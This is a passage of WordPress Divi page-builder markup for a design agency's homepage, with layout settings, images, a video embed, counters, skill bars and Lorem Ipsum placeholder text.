icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch 